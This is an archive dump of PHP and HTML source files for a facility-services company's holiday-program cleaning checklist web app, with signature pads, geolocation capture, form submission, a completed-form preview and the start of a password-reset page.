<body> <div class="container"> <div class="header"> <div class="company-name">Emera Facility Services</div> <img src="../src/img/Emera-Primary-Logo.png" alt="Company Logo"> </div> <h1>Holiday Program Cleaning Checklist</h1> <form id="cleaningChecklistForm" method="POST" enctype="multipart/form-data"> <div class="form-group"> <input type="text" class="form-control" id="subtask_id" name="subtask_id" value="<?php echo htmlspecialchars($subtask->id); ?>" hidden> </div> <div class="form-group"> <label for="schoolName">School Name:</label> <!-- Display school name as text instead of input --> <h3 id="schoolName"><?php echo htmlspecialchars($subtask->service_name); ?></h3> </div> <div class="form-group"> <label for="date">Date:</label> <!-- Display date as text instead of input --> <h3 id="date"><?php echo htmlspecialchars($subtask->subtask_date); ?></h3> </div> <!-- Main Area Checklist --> <div class="section"> <h2>Main Area</h2> <div class="form-check"> <input class="form-check-input" type="checkbox" id="main1" data-section="mainArea" value="Vacuum/Sweep hard floors and carpet areas"> <label class="form-check-label" for="main1">Vacuum/Sweep hard floors and carpet areas</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="main2" data-section="mainArea" value="Disinfect and mop hard floor areas"> <label class="form-check-label" for="main2">Disinfect and mop hard floor areas</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="main3" data-section="mainArea" value="Bin Emptied"> <label class="form-check-label" for="main3">Bin Emptied</label> </div> </div> <!-- Kitchen Area Checklist --> <div class="section"> <h2>Kitchen Area</h2> <div class="form-check"> <input class="form-check-input" type="checkbox" id="kitchen1" data-section="kitchenArea" value="Vacuum/Sweep hard floors"> <label class="form-check-label" for="kitchen1">Vacuum/Sweep hard floors</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="kitchen2" data-section="kitchenArea" value="Disinfect and mop hard floor areas"> <label class="form-check-label" for="kitchen2">Disinfect and mop hard floor areas</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="kitchen3" data-section="kitchenArea" value="Clean and wipe benchtops surroundings"> <label class="form-check-label" for="kitchen3">Clean and wipe benchtops surroundings</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="kitchen4" data-section="kitchenArea" value="Bin Emptied"> <label class="form-check-label" for="kitchen4">Bin Emptied</label> </div> </div> <!-- Bathrooms and Toilets Checklist --> <div class="section"> <h2>Bathrooms and Toilets</h2> <div class="form-check"> <input class="form-check-input" type="checkbox" id="bathroom1" data-section="bathroomArea" value="Clean and disinfect sinks and taps"> <label class="form-check-label" for="bathroom1">Clean and disinfect sinks and taps</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="bathroom2" data-section="bathroomArea" value="Clean and disinfect toilets"> <label class="form-check-label" for="bathroom2">Clean and disinfect toilets</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="bathroom3" data-section="bathroomArea" value="Floor sweep and mop"> <label class="form-check-label" for="bathroom3">Floor sweep and mop</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="bathroom4" data-section="bathroomArea" value="Bin Emptied"> <label class="form-check-label" for="bathroom4">Bin Emptied</label> </div> </div> <div class="form-group"> <label for="notes">Notes:</label> <textarea class="form-control" id="notes" name="notes" rows="4"></textarea> </div> <div class="row"> <div class="col-md-6"> <div class="form-group"> <label for="clientName">Client Representative Name:</label> <input type="text" class="form-control" id="clientName" name="clientName" required> </div> <div class="form-group"> <label for="clientSignature">Client Representative Signature:</label> <canvas id="clientSignature" class="signature-pad" onclick="openSignatureModal('client')"></canvas> </div> </div> <div class="col-md-6"> <div class="form-group"> <label for="staffName">Emera Staff Member Name:</label> <input type="text" class="form-control" id="staffName" name="staffName" required> </div> <div class="form-group"> <label for="staffSignature">Emera Staff Member Signature:</label> <canvas id="staffSignature" class="signature-pad" onclick="openSignatureModal('staff')"></canvas> </div> </div> </div> <input type="hidden" id="clientSignatureData" name="clientSignature"> <input type="hidden" id="staffSignatureData" name="staffSignature"> <input type="hidden" id="checklist_json" name="checklist_json"> <input type="hidden" id="latitude" name="latitude"> <input type="hidden" id="longitude" name="longitude"> <div class="note"> This document is to be completed after every visit from the professional cleaner. Once completed, please take a photo and send it to your supervisor. </div> <div class="button"> <input type="submit" class="btn btn-primary" value="Submit"> </div> </form> <div class="footer"> <p>Emera Facility Services</p> <p><a href="www.emerafs.com.au" target="_blank">www.emerafs.com.au</a></p> <p>16 Stelvio Close, Lynbrook, VIC 3975</p> <p>10/440 Collins St, Melbourne VIC 3000</p> <p>Phone: 1300 153 114 | Email: <a href="mailto:hello@emerafs.com.au">hello@emerafs.com.au</a></p> </div> </div> <!-- Modal --> <div class="modal fade" id="signatureModal" tabindex="-1" role="dialog" aria-labelledby="signatureModalLabel" aria-hidden="true"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="signatureModalLabel">Add Signature</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <canvas id="modalSignaturePad" class="signature-pad"></canvas> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" id="clearSignature">Clear</button> <button type="button" class="btn btn-primary" id="saveSignature">Save</button> </div> </div> </div> </div> <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/signature_pad@4.0.0/dist/signature_pad.umd.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script> <script> document.addEventListener('DOMContentLoaded', function () { var signaturePadClient = new SignaturePad(document.getElementById('clientSignature')); var signaturePadStaff = new SignaturePad(document.getElementById('staffSignature')); var modalSignaturePad = new SignaturePad(document.getElementById('modalSignaturePad')); var activeSignaturePad; function openSignatureModal(type) { $('#signatureModal').modal('show'); activeSignaturePad = type === 'client' ? signaturePadClient : signaturePadStaff; modalSignaturePad.clear(); if (!activeSignaturePad.isEmpty()) { modalSignaturePad.fromData(activeSignaturePad.toData()); } } document.getElementById('clientSignature').addEventListener('click', function () { openSignatureModal('client'); }); document.getElementById('staffSignature').addEventListener('click', function () { openSignatureModal('staff'); }); document.getElementById('clearSignature').addEventListener('click', function () { modalSignaturePad.clear(); if (activeSignaturePad) { activeSignaturePad.clear(); } }); document.getElementById('saveSignature').addEventListener('click', function () { if (!modalSignaturePad.isEmpty()) { activeSignaturePad.fromData(modalSignaturePad.toData()); } else if (activeSignaturePad) { activeSignaturePad.clear(); } $('#signatureModal').modal('hide'); }); function collectChecklistData() { const sections = ['mainArea', 'kitchenArea', 'bathroomArea']; // Add other sections if necessary const checklistData = {}; sections.forEach(section => { checklistData[section] = []; document.querySelectorAll(`input[data-section="${section}"]:checked`).forEach(item => { checklistData[section].push(item.value); }); }); return checklistData; } document.getElementById('cleaningChecklistForm').addEventListener('submit', function (e) { e.preventDefault(); if (signaturePadClient.isEmpty() || signaturePadStaff.isEmpty()) { Swal.fire({ icon: 'error', title: 'Missing Signatures', text: 'Please provide both signatures.' }); return; } // Serialize checklist data to JSON const checklistData = collectChecklistData(); document.getElementById('checklist_json').value = JSON.stringify(checklistData); // Add signatures to hidden inputs document.getElementById('clientSignatureData').value = signaturePadClient.toDataURL(); document.getElementById('staffSignatureData').value = signaturePadStaff.toDataURL(); // Get the geolocation data function getLocation() { navigator.geolocation.getCurrentPosition(function(position) { document.getElementById('latitude').value = position.coords.latitude; document.getElementById('longitude').value = position.coords.longitude; // Collect the form data var formData = new FormData(document.getElementById('cleaningChecklistForm')); //append school name, date and time to the form data formData.append('schoolName', <?php echo json_encode($subtask->service_name); ?>); formData.append('date', <?php echo json_encode($subtask->subtask_date); ?>); const subtaskTime = <?php echo json_encode($subtask->subtask_time); ?>; // Check if time is empty if (subtaskTime == null || subtaskTime.trim() === "") { // Set time to a default value, e.g., '00:00:00' formData.append('time', '00:00:00'); } else { formData.append('time', subtaskTime); } // Submit the form using fetch fetch('submit_form.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { Swal.fire({ icon: 'success', title: 'Form Submitted', text: data }).then(() => { //reload the page location.reload(); }); }) .catch(error => { Swal.fire({ icon: 'error', title: 'Submission Error', text: 'An error occurred while submitting the form. Please try again.' }); }); }, function(error) { if (error.code === error.PERMISSION_DENIED) { //submit form without geolocation set 0 to both fields document.getElementById('latitude').value = 0; document.getElementById('longitude').value = 0; // Collect the form data var formData = new FormData(document.getElementById('cleaningChecklistForm')); //append school name, date and time to the form data formData.append('schoolName', <?php echo json_encode($subtask->service_name); ?>); formData.append('date', <?php echo json_encode($subtask->subtask_date); ?>); const subtaskTime = <?php echo json_encode($subtask->subtask_time); ?>; // Check if time is empty if (subtaskTime == null || subtaskTime.trim() === "") { // Set time to a default value, e.g., '00:00:00' formData.append('time', '00:00:00'); } else { formData.append('time', subtaskTime); } // Submit the form using fetch fetch('submit_form.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { Swal.fire({ icon: 'success', title: 'Form Submitted', text: data }).then(() => { //reload the page location.reload(); }); }) .catch(error => { Swal.fire({ icon: 'error', title: 'Submission Error', text: 'An error occurred while submitting the form. Please try again.' }); }); } else { Swal.fire({ icon: 'error', title: 'Geolocation Error', text: 'Unable to retrieve your location. Please try again or enable location services in your browser settings.' }); } }); } // Initial call to get location getLocation(); }); }); </script> </body> </html> completedsubtaskform.php000064400000027446151676701240011540 0ustar00<?php //show error if not id is passed with url parameter not quarry parameter if (!isset($_GET['id'])) { echo "Invalid Request"; exit(); } else { $id = $_GET['id']; require_once '../Service/TaskFormService.php'; $TaskFormService = new TaskFormService(); $subtask = $TaskFormService->getTaskFormById($id); //check if subtask is empty if (empty($subtask)) { echo "No subtask found"; exit(); } } ?> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Preview Holiday Program Cleaning Checklist</title> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet"> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; background: url('http://localhost/CleaningChecklist/cover.jpg') no-repeat center center fixed; background-size: cover; padding: 20px; margin: 0; } .container { background-color: #fff; background: linear-gradient(to right, #e6f7ff, #ccf2ff); box-shadow: 0 0 30px rgba(0, 0, 0, 0.3); padding: 40px; border-radius: 20px; max-width: 800px; margin: auto; } .header { text-align: center; margin-bottom: 40px; } .header img { width: 170px; height: auto; } h1 { text-align: center; font-size: 3.5em; margin-bottom: 30px; color: #1e3c72; text-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3); background: linear-gradient(to right, #1e3c72, #2a5298); -webkit-background-clip: text; -webkit-text-fill-color: transparent; font-family: 'Poppins', sans-serif; } .form-group label { font-weight: bold; color: #1e3c72; font-size: 1.3em; text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3); } .form-control { border: 2px solid #2a5298; border-radius: 10px; font-size: 1.0em; padding: 14px; width: 100%; margin-bottom: 25px; transition: all 0.3s ease; } .form-control:focus { outline: none; border-color: #1e3c72; box-shadow: 0 0 7px rgba(30, 60, 114, 0.5); } .form-check-label { font-weight: bold; color: #1e3c72; margin-left: 10px; font-size: 1.3em; text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3); } .signature-pad { border: 2px dashed #2a5298; border-radius: 10px; height: 150px; background-color: #fff; box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2); margin-top: 25px; display: flex; justify-content: center; align-items: center; } .signature-pad:hover { border-color: #1e3c72; } .note { font-size: 1.2em; color: #1e3c72; margin-top: 25px; text-align: center; text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3); } .section h2 { font-size: 1.5em; color: #1e3c72; margin-bottom: 20px; text-align: left; background: linear-gradient(to right, #1e3c72, #2a5298); -webkit-background-clip: text; -webkit-text-fill-color: transparent; text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.3); font-family: 'Poppins', sans-serif; } .btn-primary { background: linear-gradient(to right, #2a5298, #1e3c72); color: #fff; border: none; padding: 15px 30px; border-radius: 8px; cursor: pointer; font-size: 20px; margin-top: 35px; display: block; width: 100%; transition: all 0.3s ease; } .btn-primary:hover { background: linear-gradient(to right, #1e3c72, #2a5298); } .footer { border-top: 1px solid #ccc; padding-top: 20px; margin-top: 35px; font-size: 1em; color: #555; text-align: center; } .section { margin-bottom: 20px; } .form-check { display: flex; align-items: center; margin-bottom: 5px; } .form-check-input { width: 20px; height: 20px; margin-right: 8px; /* Small space between checkbox and label */ } .form-check-label { margin: 0; font-weight: normal; /* Ensure sentences are not bold */ } .footer a { color: #1e3c72; text-decoration: none; } .footer a:hover { text-decoration: underline; } </style> </head> <body> <div class="container"> <div class="header"> <img src="../src/img/Emera-Primary-Logo.png" alt="Company Logo"> </div> <h1>Preview Holiday Program Cleaning Checklist</h1> <form> <div class="form-group"> <label for="schoolName">School Name:</label> <h3><?= htmlspecialchars($subtask->school_name) ?></h3> </div> <div class="form-group"> <label for="date">Date:</label> <h3><?= htmlspecialchars($subtask->date) ?></h3> </div> <div class="section"> <h2>Checklist</h2> <div class="checkboxes"> <?php // Get the main_areas data $main_areas_data = $subtask->main_areas; // Define all possible items for each section $all_main_area_items = [ "Vacuum/Sweep hard floors and carpet areas", "Disinfect and mop hard floor areas", "Bin Emptied" ]; $all_kitchen_area_items = [ "Vacuum/Sweep hard floors", "Disinfect and mop hard floor areas", "Clean and wipe benchtops surroundings", "Bin Emptied" ]; $all_bathroom_area_items = [ "Clean and disinfect sinks and taps", "Clean and disinfect toilets", "Floor sweep and mop", "Bin Emptied" ]; // Function to render checkboxes function renderCheckboxes($all_items, $selected_items) { foreach ($all_items as $item) { $is_checked = in_array($item, $selected_items); // Check if the item is in the selected items array echo '<div class="form-check">'; echo '<input class="form-check-input" type="checkbox" ' . ($is_checked ? 'checked' : '') . ' disabled>'; echo '<label class="form-check-label">' . htmlspecialchars($item) . '</label>'; echo '</div>'; } } // Function to render raw checkboxes function renderRawCheckboxes($raw_data, $all_items) { $selected_items = explode(", ", $raw_data); foreach ($all_items as $item) { $is_checked = in_array($item, $selected_items); // Check if the item is in the selected items array echo '<div class="form-check">'; echo '<input class="form-check-input" type="checkbox" ' . ($is_checked ? 'checked' : '') . ' disabled>'; echo '<label class="form-check-label">' . htmlspecialchars($item) . '</label>'; echo '</div>'; } } // Check if main_areas_data is a valid JSON string $decoded_data = json_decode($main_areas_data, true); if (json_last_error() === JSON_ERROR_NONE) { // If valid JSON, render based on JSON data echo '<h2>Main Area</h2>'; renderCheckboxes($all_main_area_items, $decoded_data['mainArea'] ?? []); echo '<h2>Kitchen Area</h2>'; renderCheckboxes($all_kitchen_area_items, $decoded_data['kitchenArea'] ?? []); echo '<h2>Bathrooms and Toilets</h2>'; renderCheckboxes($all_bathroom_area_items, $decoded_data['bathroomArea'] ?? []); } else { $main_areas = explode(", ", $subtask->main_areas); foreach ($main_areas as $area) { echo '<div class="form-check">'; echo '<input class="form-check-input" type="checkbox" checked disabled>'; echo '<label class="form-check-label">' . htmlspecialchars($area) . '</label>'; echo '</div>'; } } ?> </div> </div> <div class="section"> <label for="notes">Notes:</label> <textarea id="notes" name="notes" rows="4" class="form-control" readonly><?= htmlspecialchars($subtask->notes) ?></textarea> </div> <div class="row"> <div class="col-md-6"> <div class="form-group"> <label for="clientName" style="flex: 1;">Client Representative Name:</label> <input type="text" id="clientName" name="clientName" value="<?= htmlspecialchars($subtask->client_name) ?>" readonly style="flex: 1;"> </div> <div class="form-group"> <label for="clientSignature" style="flex: 1;">Client Representative Signature:</label> <img src="<?= htmlspecialchars($subtask->client_signature ) ?>" alt="Client Signature" class="signature-pad" style="flex: 1;"> </div> </div> <div class="col-md-6"> <div class="form-group"> <label for="staffName" style="flex: 1;">Emera Staff Member Name:</label> <input type="text" id="staffName" name="staffName" value="<?= htmlspecialchars($subtask->staff_name) ?>" readonly style="flex: 1;"> </div> <div class="form-group"> <label for="staffSignature" style="flex: 1;">Emera Staff Member Signature:</label> <img src="<?= htmlspecialchars($subtask->staff_signature) ?>" alt="Staff Signature" class="signature-pad" style="flex: 1;"> </div> </div> </div> <div class="note"> This Document is to be completed after every visit from the professional cleaner. Once completed, please take a photo and send it to your supervisor. </div> </form> <!-- <div class="footer">--> <!-- EMERA HOLDINGS PTY LTD<br>www.emeraholdings.com.au<br>--> <!-- 16 Stelvio Close, Lynbrook 3975, Vic<br>--> <!-- Phone: 1300 153 114<br>Email: info@emeraholdings.com.au--> <!-- </div>--> </div> </body> </html> taskformOld.php000064400000052547151676701240007570 0ustar00<html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Holiday Program Cleaning Checklist</title> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet"> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; background: url('https://localhost/CleaningChecklist/cover.jpg') no-repeat center center fixed; background-size: cover; padding: 20px; margin: 0; } .container { background-color: #fff; background: linear-gradient(to right, #e2e5e7, #ffffff); box-shadow: 0 0 30px rgba(0, 0, 0, 0.3); padding: 40px; border-radius: 20px; max-width: 800px; margin: auto; } .header { text-align: center; margin-bottom: 40px; } .header img { width: 160px; height: auto; } h1 { text-align: center; font-size: 3.5em; margin-bottom: 30px; color: #1e3c72; text-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3); background: linear-gradient(to right, #1e3c72, #2a5298); -webkit-background-clip: text; -webkit-text-fill-color: transparent; font-family: 'Poppins', sans-serif; } .form-group label { font-weight: bold; color: #1e3c72; font-size: 1.3em; text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3); } .form-control { border: 2px solid #2a5298; border-radius: 10px; font-size: 1.0em; padding: 14px; width: 100%; margin-bottom: 25px; transition: all 0.3s ease; } .form-control:focus { outline: none; border-color: #1e3c72; box-shadow: 0 0 7px rgba(30, 60, 114, 0.5); } .form-check-label { font-weight: bold; color: #1e3c72; margin-left: 10px; font-size: 1.3em; text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3); } .signature-pad { border: 2px dashed #2a5298; border-radius: 10px; height: 150px; background-color: #fff; box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2); margin-top: 25px; display: flex; justify-content: center; align-items: center; } .signature-pad:hover { border-color: #1e3c72; } .note { font-size: 1.2em; color: #1e3c72; margin-top: 25px; text-align: center; text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3); } .section h2 { font-size: 1.5em; color: #1e3c72; margin-bottom: 20px; text-align: left; background: linear-gradient(to right, #1e3c72, #2a5298); -webkit-background-clip: text; -webkit-text-fill-color: transparent; text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.3); font-family: 'Poppins', sans-serif; } .btn-primary { background: linear-gradient(to right, #2a5298, #1e3c72); color: #fff; border: none; padding: 15px 30px; border-radius: 8px; cursor: pointer; font-size: 20px; margin-top: 35px; display: block; width: 100%; transition: all 0.3s ease; } .btn-primary:hover { background: linear-gradient(to right, #1e3c72, #2a5298); } .footer { border-top: 1px solid #ccc; padding-top: 20px; margin-top: 35px; font-size: 1em; color: #555; text-align: center; } .section { margin-bottom: 20px; } .form-check { display: flex; align-items: center; margin-bottom: 5px; } .form-check-input { width: 20px; height: 20px; margin-right: 8px; /* Small space between checkbox and label */ } .form-check-label { margin: 0; font-weight: normal; /* Ensure sentences are not bold */ } .footer a { color: #1e3c72; text-decoration: none; } .footer a:hover { text-decoration: underline; } </style> </head> <?php date_default_timezone_set("Australia/Sydney"); // Show error if no id is passed with the URL parameter if (!isset($_GET['task_id'])) { echo "Invalid Request"; exit(); } else { $task_id = $_GET['task_id']; require_once '../Service/TaskService.php'; require_once '../Service/SubtaskService.php'; $taskService = new TaskService(); $subtaskService = new SubtaskService(); // Get task details $task = $taskService->getTaskById($task_id); // Fetch all subtasks for the given task_id $subtasks = $subtaskService->getAllSubtasksForTask($task_id); $taskOwnerEmail = $task->assignedCleaneremail; //check if the task owner email is equil form the email from the url if($taskOwnerEmail != $_GET['email']){ echo "Unauthorized Access"; exit(); } // Check if subtasks are empty if (empty($subtasks)) { echo "No subtasks found for this task"; exit(); } // Check if TODAY exists in subtask dates and get the corresponding subtask $today_date = date('Y-m-d'); $today_subtask = null; foreach ($subtasks as $subtask) { if ($subtask->subtask_date == $today_date) { $today_subtask = $subtask; break; } } // If no subtask found for today, show an appropriate message if (!$today_subtask) { echo "No subtasks scheduled for today"; exit(); } // Check if assigned cleaner email is null in task if ($task->assignedCleaneremail == null) { echo "No cleaner assigned to this task"; exit(); } // Check if subtask has already been submitted if ($today_subtask->completed == 1 && $today_subtask->completed_at != null && $today_subtask->form_submission_id != null) { echo "This subtask has already been submitted. <br> View the submitted form <a href='completedsubtaskform.php?id=$today_subtask->form_submission_id'>here</a>"; exit(); } // Display the found subtask details //echo "Subtask found for today: <br>"; //echo "Subtask ID: " . $today_subtask->id . "<br>"; //echo "Subtask Date: " . $today_subtask->subtask_date . "<br>"; // Additional details display or processing can be added here } ?> <body> <div class="container"> <div class="header"> <div class="company-name">Emera Facility Services</div> <img src="../src/img/Emera-Primary-Logo.png" alt="Company Logo"> </div> <h1>Holiday Program Cleaning Checklist</h1> <form id="cleaningChecklistForm" method="POST" enctype="multipart/form-data"> <div class="form-group"> <input type="text" class="form-control" id="subtask_id" name="subtask_id" value="<?php echo htmlspecialchars($subtask->id); ?>" hidden> </div> <div class="form-group"> <label for="schoolName">School Name:</label> <input type="text" class="form-control" id="schoolName" name="schoolName" value="<?php echo htmlspecialchars($subtask->service_name); ?>"> </div> <div class="form-group"> <label for="date">Date:</label> <input type="date" class="form-control" id="date" name="date" value="<?php echo htmlspecialchars($subtask->subtask_date); ?>"> </div> <div class="form-group"> <label for="time">Time:</label> <input type="time" class="form-control" id="time" name="time" value="<?php echo htmlspecialchars($subtask->subtask_time); ?>" > </div> <div class="section"> <h2>Main Areas</h2> <div class="form-check"> <input class="form-check-input" type="checkbox" id="main1" name="main_areas[]" value="Vacuum/Sweep hard floors and carpet areas"> <label class="form-check-label" for="main1">Vacuum/Sweep hard floors and carpet areas</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="main2" name="main_areas[]" value="Disinfect & Mop hard floor areas"> <label class="form-check-label" for="main2">Disinfect & Mop hard floor areas</label> </div> </div> <div class="section"> <h2>Kitchen Area</h2> <div class="form-check"> <input class="form-check-input" type="checkbox" id="kitchen1" name="main_areas[]" value="Vacuum/Sweep hard floors"> <label class="form-check-label" for="kitchen1">Vacuum/Sweep hard floors</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="kitchen2" name="main_areas[]" value="Disinfect & Mop hard floor areas"> <label class="form-check-label" for="kitchen2">Disinfect & Mop hard floor areas</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="kitchen3" name="main_areas[]" value="Clean and wipe bench tops and surroundings"> <label class="form-check-label" for="kitchen3">Clean and wipe bench tops and surroundings</label> </div> </div> <div class="section"> <h2>Bathrooms and Toilets</h2> <div class="form-check"> <input class="form-check-input" type="checkbox" id="bathroom1" name="main_areas[]" value="Clean and disinfect sinks and taps"> <label class="form-check-label" for="bathroom1">Clean and disinfect sinks and taps</label> </div> </div> <div class="section"> <h2>Clean and Disinfect Toilets</h2> <div class="form-check"> <input class="form-check-input" type="checkbox" id="toilet1" name="main_areas[]" value="Floor sweep and mop"> <label class="form-check-label" for="toilet1">Floor sweep and mop</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" id="toilet2" name="main_areas[]" value="Bin Emptied"> <label class="form-check-label" for="toilet2">Bin Emptied</label> </div> </div> <div class="form-group"> <label for="notes">Notes:</label> <textarea class="form-control" id="notes" name="notes" rows="4"></textarea> </div> <div class="row"> <div class="col-md-6"> <div class="form-group"> <label for="clientName">Client Representative Name:</label> <input type="text" class="form-control" id="clientName" name="clientName" required> </div> <div class="form-group"> <label for="clientSignature">Client Representative Signature:</label> <canvas id="clientSignature" class="signature-pad" onclick="openSignatureModal('client')"></canvas> </div> </div> <div class="col-md-6"> <div class="form-group"> <label for="staffName">Emera Staff Member Name:</label> <input type="text" class="form-control" id="staffName" name="staffName" required> </div> <div class="form-group"> <label for="staffSignature">Emera Staff Member Signature:</label> <canvas id="staffSignature" class="signature-pad" onclick="openSignatureModal('staff')"></canvas> </div> </div> </div> <input type="hidden" id="clientSignatureData" name="clientSignature"> <input type="hidden" id="staffSignatureData" name="staffSignature"> <input type="hidden" id="latitude" name="latitude"> <input type="hidden" id="longitude" name="longitude"> <div class="note"> This document is to be completed after every visit from the professional cleaner. Once completed, please take a photo and send it to your supervisor. </div> <div class="button"> <input type="submit" class="btn btn-primary" value="Submit"> </div> </form> <div class="footer"> <p>Emera Facility Services</p> <p><a href="www.emerafs.com.au" target="_blank">www.emerafs.com.au</a></p> <p>16 Stelvio Close, Lynbrook, VIC 3975</p> <p>10/440 Collins St, Melbourne VIC 3000</p> <p>Phone: 1300 153 114 | Email: <a href="mailto:hello@emerafs.com.au">hello@emerafs.com.au</a></p> </div> </div> <!-- Modal --> <div class="modal fade" id="signatureModal" tabindex="-1" role="dialog" aria-labelledby="signatureModalLabel" aria-hidden="true"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="signatureModalLabel">Add Signature</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <canvas id="modalSignaturePad" class="signature-pad"></canvas> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" id="clearSignature">Clear</button> <button type="button" class="btn btn-primary" id="saveSignature">Save</button> </div> </div> </div> </div> <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/signature_pad@4.0.0/dist/signature_pad.umd.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script> <script> document.addEventListener('DOMContentLoaded', function () { var signaturePadClient = new SignaturePad(document.getElementById('clientSignature')); var signaturePadStaff = new SignaturePad(document.getElementById('staffSignature')); var modalSignaturePad = new SignaturePad(document.getElementById('modalSignaturePad')); var activeSignaturePad; function openSignatureModal(type) { $('#signatureModal').modal('show'); activeSignaturePad = type === 'client' ? signaturePadClient : signaturePadStaff; modalSignaturePad.clear(); if (!activeSignaturePad.isEmpty()) { modalSignaturePad.fromData(activeSignaturePad.toData()); } } document.getElementById('clientSignature').addEventListener('click', function () { openSignatureModal('client'); }); document.getElementById('staffSignature').addEventListener('click', function () { openSignatureModal('staff'); }); document.getElementById('clearSignature').addEventListener('click', function () { modalSignaturePad.clear(); if (activeSignaturePad) { activeSignaturePad.clear(); } }); document.getElementById('saveSignature').addEventListener('click', function () { if (!modalSignaturePad.isEmpty()) { activeSignaturePad.fromData(modalSignaturePad.toData()); } else if (activeSignaturePad) { activeSignaturePad.clear(); } $('#signatureModal').modal('hide'); }); document.getElementById('cleaningChecklistForm').addEventListener('submit', function (e) { e.preventDefault(); if (signaturePadClient.isEmpty() || signaturePadStaff.isEmpty()) { Swal.fire({ icon: 'error', title: 'Missing Signatures', text: 'Please provide both signatures.' }); return; } // Add signatures to hidden inputs document.getElementById('clientSignatureData').value = signaturePadClient.toDataURL(); document.getElementById('staffSignatureData').value = signaturePadStaff.toDataURL(); // Get the geolocation data function getLocation() { navigator.geolocation.getCurrentPosition(function(position) { document.getElementById('latitude').value = position.coords.latitude; document.getElementById('longitude').value = position.coords.longitude; // Collect the form data var formData = new FormData(document.getElementById('cleaningChecklistForm')); // Submit the form using fetch fetch('submit_form.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { Swal.fire({ icon: 'success', title: 'Form Submitted', text: data }).then(() => { //reload the page location.reload(); }); }) .catch(error => { Swal.fire({ icon: 'error', title: 'Submission Error', text: 'An error occurred while submitting the form. Please try again.' }); }); }, function(error) { if (error.code === error.PERMISSION_DENIED) { //submit form without geolocation set 0 to both fields document.getElementById('latitude').value = 0; document.getElementById('longitude').value = 0; // Collect the form data var formData = new FormData(document.getElementById('cleaningChecklistForm')); // Submit the form using fetch fetch('submit_form.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { Swal.fire({ icon: 'success', title: 'Form Submitted', text: data }).then(() => { //reload the page location.reload(); }); }) .catch(error => { Swal.fire({ icon: 'error', title: 'Submission Error', text: 'An error occurred while submitting the form. Please try again.' }); }); } else { Swal.fire({ icon: 'error', title: 'Geolocation Error', text: 'Unable to retrieve your location. Please try again or enable location services in your browser settings.' }); } }); } // Initial call to get location getLocation(); }); }); </script> </body> </html> reset-password.php000064400000011467151676701240010261 0ustar00<!doctype html> <html class="no-js" lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Reset Password | Emera Facility Services</title> <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,400,600,700,800" rel="stylesheet"> <link rel="stylesheet" href="../node_modules/bootstrap/dist/css/bootstrap.min.css"> <link rel="stylesheet" href="../dist/css/theme.min.css"> <style> .auth-wrapper { display: flex; justify-content: center; align-items: center; height: 100vh; } .lavalite-bg { background-size: cover; background-position: center; height: 100%; } .center-image { display: block; margin: 0 auto; } .authentication-form { width: 100%; max-width: 400px; padding: 30px; } .form-group { margin-bottom: 20px; } .sign-btn .btn-theme { width: 100%; } .register { text-align: center; 